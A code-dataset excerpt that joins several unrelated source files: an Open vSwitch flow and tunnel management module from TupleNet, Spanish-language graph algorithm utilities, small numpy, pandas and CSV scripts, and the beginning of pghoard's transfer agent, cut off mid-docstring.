list(args))\n\ndef aggregate_flows(flows):\n length = 500\n flow_seg = [flows[x : x + length] for x in range(0, len(flows), length)]\n for seg in flow_seg:\n yield '\\n'.join(seg)\n\ndef ovs_ofctl_delflows_batch(br, flows):\n for flow_combind in aggregate_flows(flows):\n call_ovsprog(\"ovs-ofctl\", ['del-flows', '-O', OPENFLOW_VER, br,\n '--strict', '-'],\n commu=flow_combind)\n\n\ndef ovs_ofctl_addflows_batch(br, flows):\n for flow_combind in aggregate_flows(flows):\n call_ovsprog(\"ovs-ofctl\", ['add-flow', '-O', OPENFLOW_VER, br, '-'],\n commu=flow_combind)\n\ndef ovs_vsctl(*args):\n return call_ovsprog(\"ovs-vsctl\", list(args))\n\ndef parse_map(map_list):\n ret_map = {}\n if map_list[0] != 'map':\n return None\n for entry in map_list[1]:\n ret_map[entry[0]] = entry[1]\n return ret_map\n\ndef update_ovsport(record, entity_zoo):\n action_type = record[1]\n if action_type in ['new', 'initial', 'delete', 'old', 'insert']:\n # some 
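aggregate_flows in commit_ovs.py above hands ovs-ofctl its flows in newline-joined batches of 500, so one oversized flow list never becomes a single giant stdin write. The batching is plain stride slicing, which is easy to check standalone:

def chunk_join(items, size=500):
    # yield newline-joined batches of at most `size` items, as aggregate_flows does
    for i in range(0, len(items), size):
        yield '\n'.join(items[i:i + size])

flows = ['flow%d' % n for n in range(1200)]
batches = list(chunk_join(flows))
assert len(batches) == 3                 # 500 + 500 + 200
assert batches[-1].count('\n') == 199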
operations may not contain the essential fields\n        if not isinstance(record[2], int) or \\\n           record[3] == None or record[4] == None:\n            logger.debug('action %s does not contain enough info, msg:%s',\n                         action_type, record)\n            return\n    else:\n        logger.warning(\"unknown action_type:%s\", action_type)\n        return\n\n    logger.info(\"ovsport action type:%s\", action_type)\n\n    ofport = record[2]\n    name = record[3]\n    external_ids = parse_map(record[4])\n    port_type = record[5]\n\n    # adding an internal port may imply that a new bridge was created,\n    # we should update zoo's version to test if tuplenet should rebuild\n    # patchports.\n    if port_type == 'internal':\n        entity_zoo.update_version_force()\n\n    if external_ids.has_key('iface-id'):\n        uuid = external_ids['iface-id']\n        is_remote = False\n        entity_type = lgview.LOGICAL_ENTITY_TYPE_OVSPORT\n    elif external_ids.has_key('chassis-id'):\n        uuid = external_ids['chassis-id']\n        is_remote = True\n        entity_type = lgview.LOGICAL_ENTITY_TYPE_OVSPORT_CHASSIS\n    else:\n        logger.info('external_ids has no chassis-id or iface-id, record:%s',\n                    record)\n        return\n\n    if action_type in ['old', 'delete']:\n        logger.info(\"try to move port %s to sink uuid:%s\", name, uuid)\n        entity_zoo.move_entity2sink(entity_type, name)\n    else:\n        if ofport < 0:\n            logger.info(\"do not accept ovsport %s which has negative ofport %d\", name, ofport)\n            return\n        logger.info(\"try to add ovsport entity %s ofport:%d, uuid:%s in zoo\",\n                    name, ofport, uuid)\n        entity_zoo.add_entity(entity_type, name, uuid, ofport, is_remote)\n    return\n\n\ndef monitor_ovsdb(entity_zoo, extra):\n    pyDatalog.Logic(extra['logic'])\n    cmd = ['ovsdb-client', 'monitor', 'Interface',\n           'ofport', 'name', 'external_ids', 'type', '--format=json']\n\n    logger.info(\"start ovsdb-client instance\")\n    try:\n        child = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n                                 preexec_fn=on_parent_exit('SIGTERM'))\n        with extra['lock']:\n            extra['ovsdb-client'] = child\n        logger.info(\"monitoring the ovsdb\")\n        while child.poll() == None:\n            json_str = child.stdout.readline().strip()\n            output = json.loads(json_str)\n            with entity_zoo.lock:\n                for record in output['data']:\n                    update_ovsport(record, entity_zoo)\n    except ValueError as err:\n        if json_str != \"\":\n            logger.warning(\"cannot parse %s to json object\", json_str)\n        else:\n            logger.info('json_str is empty, maybe we should exit')\n        subprocess.Popen.kill(child)\n        return\n    except Exception as err:\n        logger.exception(\"exit ovsdb-client monitor, err:%s\", str(err))\n        subprocess.Popen.kill(child)\n        return\n\ndef start_monitor_ovsdb(entity_zoo, extra):\n    t = threading.Thread(target = monitor_ovsdb,\n                         args=(entity_zoo, extra))\n    t.setDaemon(True)\n    t.start()\n    return t\n\ndef clean_ovs_flows(br = 'br-int'):\n    try:\n        ovs_ofctl(\"del-flows\", br)\n    except Exception as err:\n        logger.error(\"failed to clean bridge %s flows\", br)\n        raise OVSToolErr(\"failed to clean ovs flows\")\n    else:\n        logger.info(\"clean all flows in %s\", br)\n\ndef insert_ovs_ipfix(br = 'br-int'):\n    try:\n        ovs_vsctl('clear', 'bridge', br, 'ipfix')\n\n        options = get_extra()['options']\n        if 'IPFIX_CFG' in options:\n            cfg = options['IPFIX_CFG']\n            logger.debug('add ipfix record {}'.format(cfg))\n\n            ovs_vsctl('--', 'set', 'Bridge', br, 'ipfix=@i', '--', '--id=@i', \\\n                      'create', 'IPFIX', 'targets=\\\"{}\\\"'.format(cfg['collector']), \\\n                      'obs_domain_id={}'.format(cfg['domain_id']), \\\n                      'obs_point_id={}'.format(cfg['point_id']), \\\n                      'sampling={}'.format(cfg['sampling_rate']), \\\n                      'other_config:enable-tunnel-sampling=false')\n    except Exception as 
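parse_map above unwraps OVSDB's wire encoding ['map', [[key, value], ...]] into a plain dict, and update_ovsport then reads the monitor row positionally (action, ofport, name, external_ids, type). A tiny illustration with a made-up external_ids cell:

def parse_map_demo(map_list):
    # same contract as parse_map above: None unless the cell is tagged 'map'
    if map_list[0] != 'map':
        return None
    return {key: value for key, value in map_list[1]}

cell = ['map', [['iface-id', 'lsp-1'], ['vm-id', 'f00']]]
assert parse_map_demo(cell) == {'iface-id': 'lsp-1', 'vm-id': 'f00'}
assert parse_map_demo(['set', []]) is None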
e:\n logger.error('failed to alter ipfix record for %s: %s', br, e)\n raise OVSToolErr('failed to alter ipfix record: ' + str(e))\n\ndef system_id():\n cmd = ['ovsdb-client', '-v', 'transact',\n '[\"Open_vSwitch\",{\"op\":\"select\", \\\n \"table\":\"Open_vSwitch\",\"columns\":[\"external_ids\"], \\\n \"where\":[]}]']\n try:\n json_str = call_popen(cmd, shell=False)\n except Exception:\n logger.error('failed to get system-id')\n return\n output = json.loads(json_str)[0]\n external_ids = parse_map(output['rows'][0]['external_ids'])\n if external_ids.has_key('system-id'):\n return external_ids['system-id']\n\ndef remove_tunnel_by_name(portname):\n try:\n ovs_vsctl('get', 'interface', portname, 'name')\n except Exception as err:\n # cannot found this port, return immedately\n logger.debug(\"port %s is not exist, no need to remove it\", portname)\n return\n try:\n ovs_vsctl('del-port', 'br-int', portname)\n except Exception as err:\n logger.info(\"cannot delete tunnel port:%s\", err)\n logger.info(\"delete ovs tunnel port %s\", portname)\n return\n\ndef get_tunnel_chassis_id(portname):\n try:\n return ovs_vsctl('get', 'interface', portname,\n 'external_ids:chassis-id').strip(\"\\\"\")\n except Exception as err:\n return \"\"\n\ndef chassis_ip_to_portname(ip):\n chassis_ip_int = struct.unpack(\"!L\", socket.inet_aton(ip))[0]\n portname = '{}{}'.format(TP_TUNNEL_PORT_NAME_PREFIX, chassis_ip_int)\n return portname\n\ndef remove_tunnel_by_ip(ip):\n portname = chassis_ip_to_portname(ip)\n remove_tunnel_by_name(portname)\n\ndef create_tunnel(ip, uuid):\n portname = chassis_ip_to_portname(ip)\n if get_tunnel_chassis_id(portname) == uuid:\n logger.info(\"found a exist tunnel ovsport has \"\n \"same chassis-id and portname, skip adding tunnel ovsport\")\n return portname\n remove_tunnel_by_name(portname)\n cmd = ['add-port', 'br-int', portname, '--', 'set', 'interface',\n portname, 'type=geneve', 'options:remote_ip={}'.format(ip),\n 'options:key=flow', 'options:csum=true',\n 'external_ids:chassis-id={}'.format(uuid)]\n logger.info(\"adding ovs tunnel port %s\", portname)\n try:\n ovs_vsctl(*cmd)\n except Exception as err:\n logger.error('cannot create tunnle, cmd:%s, err:%s', cmd, err)\n return portname\n\n return portname\n\ndef create_flowbased_tunnel(chassis_id):\n portname = \"{}flowbased\".format(TP_TUNNEL_PORT_NAME_PREFIX)\n remove_tunnel_by_name(portname)\n cmd = ['add-port', 'br-int', portname, '--', 'set', 'interface',\n portname, 'type=geneve', 'options:remote_ip=flow',\n 'options:key=flow', 'options:csum=true',\n 'external_ids:chassis-id={}'.format(chassis_id)]\n logger.info(\"adding ovs tunnel port %s\", portname)\n try:\n ovs_vsctl(*cmd)\n except Exception as err:\n logger.error('cannot create flow-based tunnle, cmd:%s, err:%s',\n cmd, err)\n return portname\n\n\ndef create_patchport(portname, peer_br, br = 'br-int'):\n peer_portname = portname + \"-peer\"\n try:\n ovs_vsctl('br-exists', peer_br)\n except:\n logger.info(\"the bridge %s is not exist, would not create patchports\",\n peer_br)\n return\n\n cmd = []\n try:\n ovs_vsctl('list', 'interface', portname)\n except:\n cmd += ['--', 'add-port', br, portname,\n '--', 'set', 'interface', portname, 'type=patch',\n 'options:peer={}'.format(peer_portname),\n 'external_ids:iface-id={}'.format(portname)\n ]\n\n try:\n ovs_vsctl('list', 'interface', peer_portname)\n except:\n cmd += ['--', 'add-port', peer_br, peer_portname,\n '--', 'set', 'interface', peer_portname, 'type=patch',\n 'options:peer={}'.format(portname),\n 
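chassis_ip_to_portname above keeps tunnel port names short, stable and collision-free by packing the peer IP into its 32-bit big-endian integer; 10.0.0.1, for instance, becomes tupleNet-167772161:

import socket
import struct

ip_int = struct.unpack("!L", socket.inet_aton('10.0.0.1'))[0]
assert ip_int == 10 * 2 ** 24 + 1 == 167772161
assert 'tupleNet-{}'.format(ip_int) == 'tupleNet-167772161'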
'external_ids:iface-id={}'.format(peer_portname)\n ]\n if len(cmd) == 0:\n logger.info(\"the patchports had been created, skip..\")\n return\n\n try:\n ovs_vsctl(*cmd)\n except Exception as err:\n logger.warning(\"failed to create patchport, err:%s\", err)\n else:\n logger.info(\"created patchport %s, %s\", portname, peer_portname)\n\n\ndef delete_patchport(portname):\n try:\n peer_portname = ovs_vsctl('get', 'interface', portname,\n 'options:peer').strip(\"\\\"\")\n except Exception as err:\n logger.warning(\"failed to get %s peer patchport information, err:%s\",\n portname, err)\n return\n try:\n ovs_vsctl('del-port', portname)\n except Exception as err:\n logger.warning(\"failed to delete patchport %s, err:%s\", portname, err)\n return\n\n try:\n ovs_vsctl('list', 'interface', peer_portname)\n except Exception as err:\n logger.warning(\"failed to find patchport %s, err:%s\",\n peer_portname, err)\n return\n try:\n ovs_vsctl('del-port', peer_portname)\n except Exception as err:\n logger.warning(\"failed to delete patchport %s, err:%s\", peer_portname, err)\n return\n logger.info(\"removed patchport %s %s\", portname, peer_portname)\n\ndef commit_replaceflows(replace_flows, br = 'br-int'):\n # commit_replaceflows is only consumed by update_logical_view in booting\n # tuplenet stage. Keep all flows in a file to avoid using stdin which may\n # introduce buffer size issue.\n # this function can help to avoid ports' issue of breaking-network, the\n # replace-flows is a transaction, so would not change flows if it hit issue\n filepath = '/tmp/ovs-flow-{}'.format(''.join(\n random.choice(string.ascii_uppercase + string.digits) for _ in range(5)))\n filepath += str(time.time())\n try:\n with open(filepath, 'w') as fp:\n fp.write('\\n'.join(replace_flows))\n ovs_ofctl('replace-flows', '-O', OPENFLOW_VER, br, filepath)\n os.remove(filepath)\n except IOError as err:\n logger.error(\"failed to write flows into file %s\", filepath)\n raise\n except RuntimeError as err:\n logger.error(\"failed to replace flows in {}\".format(filepath))\n raise OVSToolErr(\"failed to replace flows\")\n except OSError as err:\n logger.warning(\"failed to remove the %s\", filepath)\n raise\n\n\n\ndef commit_flows(add_flows, del_flows):\n # consume batch method to insert/delete flows first.\n # update ovs flow one by one if updateing flow hit issue.\n\n with flow_lock:\n try:\n total_flow_n = len(del_flows) + len(add_flows)\n if len(del_flows) > 0:\n ovs_ofctl_delflows_batch('br-int', del_flows)\n del_flows = []\n if len(add_flows) > 0:\n ovs_ofctl_addflows_batch('br-int', add_flows)\n add_flows = []\n return total_flow_n\n except Exception as err:\n logger.warn(\"failed to batch modify flows, \"\n \"will try to update one by one, err:%s\", err)\n\n # insert/delete flow one by one once the batch processing hit error\n cm_cnt = 0\n for flow in del_flows:\n try:\n ovs_ofctl('del-flows', 'br-int', flow, '--strict')\n except Exception as err:\n logger.error('failed to delete flow(%s) at ovs, err:%s',\n flow, err)\n continue;\n cm_cnt += 1\n\n for flow in add_flows:\n try:\n ovs_ofctl('add-flow', 'br-int', flow)\n except Exception as err:\n logger.error('failed to add flow(%s) at ovs, err:%s',\n flow, err)\n continue;\n cm_cnt += 1\n return cm_cnt;\n\ndef _set_br_failmode(br, mode):\n try:\n cur_mode = ovs_vsctl('get-fail-mode', br)\n except Exception:\n logger.error(\"failed to get fail mode of bridge %s\", br)\n raise OVSToolErr(\"failed to get fail mode of bridge\")\n if cur_mode != mode:\n logger.info(\"config bridge %s 
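commit_replaceflows above hand-rolls a random file name under /tmp from uppercase letters, digits and a timestamp; the standard-library route for the same need is tempfile, which creates a fresh file atomically. A sketch of that alternative (an idiom suggestion, not what the module does):

import os
import tempfile

def write_flows_tmpfile(flows):
    # mkstemp creates and opens a unique file atomically; the caller removes it
    fd, path = tempfile.mkstemp(prefix='ovs-flow-')
    with os.fdopen(fd, 'w') as fp:
        fp.write('\n'.join(flows))
    return path

path = write_flows_tmpfile(['flow1', 'flow2'])
os.remove(path)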
fail-mode into %s\", br, mode)\n try:\n ovs_vsctl('set-fail-mode', br, mode)\n except Exception:\n logger.error(\"failed to config %s fail-mode into %s\", br, mode)\n raise OVSToolErr(\"failed to config fail-mode\")\n\ndef _get_br_integration_mac(br):\n try:\n mac = ovs_vsctl('get', 'interface', br, 'mac_in_use')\n except Exception:\n logger.error(\"failed to get bridge %s's mac_in_use\", br)\n return\n mac = mac.encode('ascii','ignore').replace('\"', '')\n return mac\n\ndef build_br_integration(br = 'br-int'):\n try:\n ovs_vsctl('br-exists', br)\n logger.info(\"the bridge %s is exist\", br)\n _set_br_failmode(br, 'secure')\n # if we hit no issue, then it means the bridge is exist\n return _get_br_integration_mac(br)\n except Exception as err:\n logger.info(\"the bridge %s is not exist, try to create a new one\", br)\n try:\n ovs_vsctl('add-br', br, '--', 'set', 'Bridge', br, 'fail-mode=secure')\n logger.info(\"create bridge %s for integration\", br)\n except Exception as err:\n logger.error(\"failed to create %s\", br)\n raise OVSToolErr(\"failed to create integration bridge\")\n\n return _get_br_integration_mac(br)\n\ndef set_tunnel_tlv(vipclass = 0xffee, br = 'br-int'):\n while True:\n try:\n output = ovs_ofctl('dump-tlv-map', br)\n except Exception as err:\n logger.error(\"failed dump %s tlv, err:%s\", br, err)\n raise OVSToolErr(\"failed to dump tlv\")\n # TODO it is a fool check, update it\n if \"tun_metadata0\" in output:\n logger.info(output)\n return\n\n try:\n ovs_ofctl('del-tlv-map', br)\n except Exception as err:\n logger.error(\"failed to clean %s tlv, err:%s\", br, err)\n raise OVSToolErr(\"failed to clean tlv\")\n\n tlv = \"{{class={},type=0,len=8}}->tun_metadata0\".format(vipclass)\n try:\n ovs_ofctl('add-tlv-map', br, tlv)\n except Exception as err:\n logger.error('failed to config tlv %s to %s, err:%s', tlv, br, err)\n raise OVSToolErr(\"failed to config tlv\")\n\n logger.info(\"set tlv %s on %s\", tlv, br)\n\ndef set_upcall_rate(br = 'br-int', rate = 100):\n #TODO we need to limite the packet rate of upcalling to packet_controller\n pass\n\n\ndef config_ovsport_bfd(portname, config):\n try:\n ovs_vsctl('set', 'Interface', portname, 'bfd:{}'.format(config))\n except Exception as err:\n logger.info(\"failed to config %s bfd to %s, \"\n \"port may not exist, err:%s\",\n portname, config, err)\n\ndef inject_pkt_to_ovsport(cmd_id, packet_data, ofport):\n try:\n ovs_ofctl('packet-out', 'br-int', 'NONE',\n ('load:{}->NXM_OF_IN_PORT[],'\n 'load:{}->NXM_NX_REG10[16..31],'\n 'load:1->NXM_NX_REG10[1],resubmit(,0)').format(ofport, cmd_id),\n packet_data)\n except Exception as err:\n logger.warning(\"failed to inject packet %s to ofport %d\",\n packet_data, ofport)\n\n","sub_path":"src/tuplenet/lcp/commit_ovs.py","file_name":"commit_ovs.py","file_ext":"py","file_size_in_byte":18006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608156924","text":"import csv\r\nimport heapq\r\nfrom collections import deque\r\nfrom TDAgrafo import *\r\n\r\nINF = 9999999\r\n\r\ndef parsear_archivo_grafo(file,grafo):\r\n vertices = {}\r\n with open (file,\"r\") as f:\r\n f_reader = csv.reader(f,delimiter=',')\r\n for row in f_reader:\r\n if(len(row)==3):\r\n try:\r\n vertice = row[0]\r\n coordenadas = (float(row[1]),float(row[2]))\r\n grafo.agregar_vertice(vertice,coordenadas)\r\n\r\n except ValueError:\r\n vertice = row[0]\r\n arista = row[1]\r\n peso = int(row[2])\r\n grafo.agregar_arista(vertice,arista,peso)\r\n\r\n return grafo\r\n\r\ndef 
parsear_recomendaciones(file, grafo):\r\n grafo_dirigido = Grafo()\r\n\r\n for vertice in grafo.obtener_vertices():\r\n grafo_dirigido.agregar_vertice(vertice)\r\n\r\n with open (file,\"r\") as f:\r\n f_reader = csv.reader(f, delimiter=',')\r\n for row in f_reader:\r\n vertice_entrada = row[0]\r\n vertice_salida = row[1]\r\n grafo_dirigido.agregar_arista_dirigido(vertice_entrada, vertice_salida, grafo.obtener_peso_arista(vertice_entrada, vertice_salida))\r\n return grafo_dirigido\r\n\r\n\r\ndef costo_trayecto(grafo,trayecto):\r\n costo = 0\r\n for sede in range (0,len(trayecto)):\r\n try:\r\n act = trayecto[sede]\r\n prox = trayecto[sede+1]\r\n\r\n costo += grafo.obtener_peso_arista(act,prox)\r\n except IndexError:\r\n break\r\n return costo\r\n\r\n\r\ndef reconstruir_ciclo(padre, origen, destino):\r\n camino = []\r\n actual = destino\r\n while actual != origen:\r\n camino.insert(0,actual)\r\n actual = padre[actual]\r\n camino.insert(0,origen)\r\n return camino\r\n\r\ndef camino_minimo(grafo,inicio,fin):\r\n distancia = dict.fromkeys(grafo.obtener_vertices(),INF)\r\n padre = {}\r\n heap = []\r\n\r\n\r\n distancia[inicio] = 0\r\n padre[inicio] = None\r\n\r\n heapq.heappush(heap,(inicio,distancia[inicio]))\r\n\r\n while heap:\r\n v = heapq.heappop(heap)\r\n try:\r\n for w in grafo.obtener_adyacentes(v[0]):\r\n if (distancia[v[0]] + grafo.obtener_peso_arista(v[0],w) < distancia[w]):\r\n padre[w] = v[0]\r\n distancia[w] = distancia[v[0]] + grafo.obtener_peso_arista(v[0],w)\r\n heapq.heappush(heap,(w,distancia[w]))\r\n except TypeError:\r\n continue\r\n\r\n trayecto = reconstruir_ciclo(padre,inicio,fin)\r\n costo = costo_trayecto(grafo,trayecto)\r\n return trayecto,costo\r\n\r\n\r\ndef arbol_tendido_minimo_prim(grafo):\r\n inicio = grafo.obtener_vertice_random()\r\n # inicio = grafo.obtener_vertices()[5]\r\n\r\n visitados = []\r\n peso_total = 0\r\n heap = []\r\n arbol = Grafo()\r\n for vertice in grafo.obtener_vertices():\r\n arbol.agregar_vertice(vertice)\r\n\r\n for w in grafo.obtener_adyacentes(inicio):\r\n peso = grafo.obtener_peso_arista(inicio, w)\r\n heapq.heappush(heap, (peso,inicio,w))\r\n i = 0\r\n\r\n while heap:\r\n (peso, origen, destino) = heapq.heappop(heap)\r\n if destino not in visitados:\r\n visitados.append(destino)\r\n arbol.agregar_arista(origen,destino,peso)\r\n if i != 0:\r\n peso_total += peso\r\n i += 1\r\n for a in grafo.obtener_adyacentes(destino):\r\n peso = grafo.obtener_peso_arista(destino,a)\r\n if (a not in visitados):\r\n heapq.heappush(heap, (peso,destino,a))\r\n\r\n return (visitados,peso_total),arbol\r\n\r\ndef problema_viajante_bt(grafo, origen):\r\n\r\n visitados = []\r\n mejor_recorrido = [(INF, [])]\r\n _problema_viajante_bt(grafo, origen, origen, visitados, mejor_recorrido, 0)\r\n mejor_recorrido[0][1].append(origen)\r\n return mejor_recorrido[0]\r\n\r\n\r\ndef _problema_viajante_bt(grafo, origen, v, visitados, mejor_recorrido, recorrido_actual):\r\n visitados.append(v)\r\n if len(visitados) == grafo.cantidad_vertices():\r\n return grafo.obtener_peso_arista(v, origen)\r\n\r\n if recorrido_actual > mejor_recorrido[0][0]:\r\n return 0\r\n\r\n for w in grafo.obtener_adyacentes(v):\r\n if w not in visitados:\r\n recorrido_actual += grafo.obtener_peso_arista(v, w)\r\n siguiente = _problema_viajante_bt(grafo, origen, w, visitados, mejor_recorrido, recorrido_actual)\r\n recorrido_actual += siguiente\r\n\r\n if len(visitados) == grafo.cantidad_vertices() and recorrido_actual < mejor_recorrido[0][0]:\r\n mejor_recorrido[0] = (recorrido_actual, 
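Note that camino_minimo above pushes (vertex, distance) tuples, so heapq orders entries by vertex name rather than by distance; the relaxation test keeps the answer correct for non-negative weights, but the visiting order is no longer Dijkstra's. The conventional key puts distance first, as in this minimal sketch over a plain adjacency dict (not the TDAgrafo API):

import heapq

def dijkstra(adj, start):
    # adj: {node: [(neighbor, weight), ...]}, weights non-negative
    dist = {start: 0}
    heap = [(0, start)]              # (distance, node): heapq pops the closest node first
    while heap:
        d, u = heapq.heappop(heap)
        if d > dist.get(u, float('inf')):
            continue                 # stale entry, already improved
        for v, w in adj.get(u, []):
            nd = d + w
            if nd < dist.get(v, float('inf')):
                dist[v] = nd
                heapq.heappush(heap, (nd, v))
    return dist

assert dijkstra({'a': [('b', 2), ('c', 5)], 'b': [('c', 1)]}, 'a') == {'a': 0, 'b': 2, 'c': 3}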
visitados[:])\r\n\r\n visitados.pop()\r\n\r\n recorrido_actual -= (grafo.obtener_peso_arista(v,w) + siguiente)\r\n return recorrido_actual\r\n\r\n\r\ndef obtener_arista_minima(grafo, vertice, visitados):\r\n arista_minima = (INF, None)\r\n for adyacente in grafo.obtener_adyacentes(vertice):\r\n if adyacente not in visitados:\r\n peso = grafo.obtener_peso_arista(vertice, adyacente)\r\n if arista_minima[0] > peso:\r\n arista_minima = (peso, adyacente)\r\n return arista_minima\r\n\r\n\r\ndef viajante_aproximado(grafo, inicio):\r\n visitados = []\r\n peso_camino = 0\r\n camino_eficiente = _viajante_aproximado(grafo, inicio, inicio, visitados, peso_camino)\r\n\r\n return camino_eficiente\r\n\r\n\r\ndef _viajante_aproximado(grafo, origen, inicio, visitados, peso_camino):\r\n visitados.append(inicio)\r\n\r\n if len(visitados) == grafo.cantidad_vertices():\r\n peso_camino += grafo.obtener_peso_arista(inicio, origen)\r\n visitados.append(origen)\r\n return peso_camino, visitados\r\n\r\n arista_minima = obtener_arista_minima(grafo, inicio, visitados)\r\n peso_camino += arista_minima[0]\r\n return _viajante_aproximado(grafo, origen, arista_minima[1], visitados, peso_camino)\r\n\r\n\r\ndef orden_topologico(grafo):\r\n grado_entrada = {}\r\n\r\n for v in grafo.obtener_vertices():\r\n grado_entrada[v] = 0\r\n for v in grafo.obtener_vertices():\r\n for w in grafo.obtener_adyacentes(v):\r\n grado_entrada[w] += 1\r\n\r\n cola = deque()\r\n\r\n for z in grado_entrada.keys():\r\n if grado_entrada[z] == 0:\r\n cola.append(z)\r\n\r\n salida = []\r\n peso = 0\r\n\r\n while cola:\r\n v = cola.popleft()\r\n salida.append(v)\r\n for w in grafo.obtener_adyacentes(v):\r\n grado_entrada[w] -= 1\r\n peso += grafo.obtener_peso_arista(v,w)\r\n if grado_entrada[w] == 0:\r\n cola.append(w)\r\n return peso, salida\r\n","sub_path":"tejotools.py","file_name":"tejotools.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"439021121","text":"import cv2\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom scipy import misc\n\n# read image\nimg_path = \"/home/student-5/Downloads/im1.jpg\"\nim = cv2.imread(img_path, 0)\nim = im.astype(np.float64)/255\n\ncv2.imshow(\"orig img\", im)\n\n# create noise matrix\nnoise = np.random.rand(im.shape[0], im.shape[1])\ncv2.imshow(\"noise\", noise)\n\n# multiply to create a noise image\nnoise_img = np.dot(noise, im)\ncv2.imshow(\"noisy img\", noise_img/np.amax(noise_img)) # normalize\n\n\n\n# find noise inverse using SVD\nU, s, Vt = np.linalg.svd(noise)\n\n\nS = np.linalg.inv(np.diag(s))\nUt = np.transpose(U)\nV = np.transpose(Vt)\n\nnoise_inverse = np.dot(np.dot(V, S), Ut)\n\nreverted_im = np.dot(noise_inverse, noise_img)\n#\n# n = s.shape[0]\n# s_sorted = np.argsort(s)\n# rms=[]\n# for k in range(n):\n# s[s_sorted[:n-k]] = 0 # take indices of n-k smallest\n# rms.append(np.sqrt(np.mean(np.square(im - reverted_im))))\n# plt.plot(range(k), rms)\n# plt.show()\n# revert original image using inverted noise matrix\ncv2.imshow(\"reverted img using SVD\", reverted_im )\n\ncv2.waitKey(0)\n\n\n\n\n\n\n\n","sub_path":"imageProc/svd.py","file_name":"svd.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"613465331","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 22 19:10:06 2019\n\n@author: James\n\"\"\"\nimport numpy as np\nimport pandas\n#Do Later: 
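The V S^-1 U^T reconstruction in svd.py above is the matrix inverse numpy exposes directly; for a square, invertible noise matrix the two agree, which is quick to verify (a sketch assuming such a matrix):

import numpy as np

rng = np.random.default_rng(0)
noise = rng.random((4, 4))                    # almost surely invertible

U, s, Vt = np.linalg.svd(noise)
manual_inv = Vt.T @ np.diag(1.0 / s) @ U.T    # V . S^-1 . U^T, as in svd.py

assert np.allclose(manual_inv, np.linalg.inv(noise))
assert np.allclose(manual_inv @ noise, np.eye(4))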
https://matplotlib.org/tutorials/index.html#introductory\n\ndef pandasDataFrame():\n myarray = np.array([[1, 2, 3], [4, 5, 6]])\n np.set_printoptions(threshold=np.inf)\n print(myarray)\n print('\\n')\n rownames = ['a', 'b']\n colnames = ['one', 'two', 'three']\n mydataframe = pandas.DataFrame(myarray, index=rownames, columns=colnames)\n print(mydataframe)\n\n\npandasDataFrame()\n","sub_path":"Less2.py","file_name":"Less2.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"573169830","text":"import pandas as pd \nimport numpy as np\n\n\ndf1 = pd.read_csv(\"renametrain.csv\")\ndf2 = pd.read_csv(\"speechdata.csv\")\n\ndef f(tx):\n\tt = tx.lower()\n\tx = df2[df2['index']==t]['promptsForPython'].values[0]\n\treturn x\n\n\ndf = df1\n\ndf['prompttexts'] = df['prompt'].apply(f)\n\ndf.to_csv(\"speechprompts.csv\")\n\n\nprompts = df[['samplenumber','prompttexts']].values.tolist()\n\n\nf1 = open('sentences.txt','w')\n\nfor prompt in prompts:\n\ttxt = '*/'+prompt[0]+' '+prompt[1]\n\tprint(txt,file=f1)\n\nf1.close()\n\n\n\n","sub_path":"Model Example/model/dataPrep/trainspeech/speechpromtcombi.py","file_name":"speechpromtcombi.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241920210","text":"\"\"\"\npghoard\n\nCopyright (c) 2016 Ohmu Ltd\nSee LICENSE for details\n\"\"\"\nfrom pghoard.common import create_alert_file, get_object_storage_config\nfrom pghoard.rohmu.compat import suppress\nfrom pghoard.rohmu.errors import (\n FileNotFoundFromStorageError,\n LocalFileIsRemoteFileError,\n)\nfrom pghoard.rohmu import get_transfer\nfrom queue import Empty\nfrom threading import Thread, Lock\nimport logging\nimport os\nimport time\n\n_STATS_LOCK = Lock()\n_last_stats_transmit_time = 0\n\n\nclass TransferAgent(Thread):\n def __init__(self, config, compression_queue, transfer_queue, stats,\n shared_state_dict):\n super().__init__()\n self.log = logging.getLogger(\"TransferAgent\")\n self.config = config\n self.stats = stats\n self.compression_queue = compression_queue\n self.transfer_queue = transfer_queue\n self.running = True\n self.state = shared_state_dict\n self.site_transfers = {}\n self.log.debug(\"TransferAgent initialized\")\n\n def set_state_defaults_for_site(self, site):\n if site not in self.state:\n EMPTY = {\"data\": 0, \"count\": 0, \"time_taken\": 0.0, \"failures\": 0,\n \"xlogs_since_basebackup\": 0, \"last_success\": None}\n\n def defaults():\n return {\"basebackup\": EMPTY.copy(), \"xlog\": EMPTY.copy(), \"timeline\": EMPTY.copy()}\n\n self.state[site] = {\n \"upload\": defaults(),\n \"download\": defaults(),\n \"metadata\": defaults(),\n \"list\": defaults(),\n }\n\n def get_object_storage(self, site_name):\n storage = self.site_transfers.get(site_name)\n if not storage:\n storage_config = get_object_storage_config(self.config, site_name)\n storage = get_transfer(storage_config)\n self.site_transfers[site_name] = storage\n\n return storage\n\n @staticmethod\n def form_key_path(file_to_transfer):\n name = os.path.basename(file_to_transfer[\"local_path\"])\n return os.path.join(file_to_transfer[\"path_prefix\"],\n file_to_transfer[\"site\"],\n file_to_transfer[\"filetype\"],\n name)\n\n def transmit_statsd_metrics(self):\n \"\"\"\n Keep statsd updated about how long time ago each filetype was successfully uploaded.\n Transmits max once per ten seconds, regardless of how many threads are running.\n 
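The apply() lookup in speechpromtcombi.py above rescans df2 once per row of df1; the vectorized equivalent is a case-normalized merge. A sketch with toy frames (the column names follow the script, the rows are made up):

import pandas as pd

df1 = pd.DataFrame({'samplenumber': ['s1', 's2'], 'prompt': ['Hello', 'WORLD']})
df2 = pd.DataFrame({'index': ['hello', 'world'], 'promptsForPython': ['hi there', 'the world']})

df1['key'] = df1['prompt'].str.lower()
merged = df1.merge(df2, left_on='key', right_on='index', how='left')
assert list(merged['promptsForPython']) == ['hi there', 'the world']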
